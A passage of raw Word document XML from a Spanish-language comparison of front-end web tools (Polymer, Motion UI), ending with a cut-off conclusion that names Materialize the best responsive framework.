              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Toolbox</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Polymer te permite usar Web Components hoy</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Polymer es un conjunto de librerías especiales, mejor conocidas como Polyfills</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Puedes crear tus propios Custom Elements.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CUSTOM ELEMENTS </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HTML TEMPLATES </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SHADOW DOM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>HTML IMPORTS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>BSD-OLD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">
        <w:trPr>
          <w:trHeight w:val="306"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Motion UI</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DB5724" wp14:editId="5DAACC5B">
                  <wp:extent cx="2581275" cy="1299242"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="59" name="Imagen 59" descr="Resultado de imagen para motion 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para motion ui"/>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582139" cy="1299677"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Motion UI es una biblioteca Sass para crear rápidamente transiciones y animaciones de CSS. Motion UI incluye un conjunto de efectos prefabricados como clases de CSS. Esto incluye los efectos de transición a deslizamiento, fundido, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>bisagra, escala y giro, así como algunas animaciones incorporadas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Se puede adaptar fácilmente para trabajar con cualquier biblioteca de animación de frameworks, como Angular o React.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Motion es una herramienta poderosa para los diseñadores, que </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>nos permite diseñar interfaces más expresivas al darles a los usuarios colas alrededor de la jerarquía, la orientación espacial, y más.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>JAVASCRIPT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>JQUERY</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>SASS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004633DE" w:rsidRPr="004633DE" w:rsidRDefault="004633DE" w:rsidP="004633DE"/>
    <w:p w:rsidR="00890B46" w:rsidRPr="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRPr="00890B46" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRDefault="00D31662" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00325E60" w:rsidRDefault="00325E60" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis5"/>
        <w:tblW w:w="0" w:type="auto"/>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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="17314"/>
      </w:tblGrid>
      <w:tr w:rsidR="00081D6F" w:rsidTr="00081D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14" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00081D6F" w:rsidRPr="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>MEJOR TECNOLOGÍA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00081D6F" w:rsidTr="00081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14" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00081D6F" w:rsidRPr="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">La mejor tecnología según analizando la comparación, en cuanto a los framework de diseño responsivos, el que tiene mayores ventajas tanto de su uso y facilidad de aprender es </w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Materialize</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
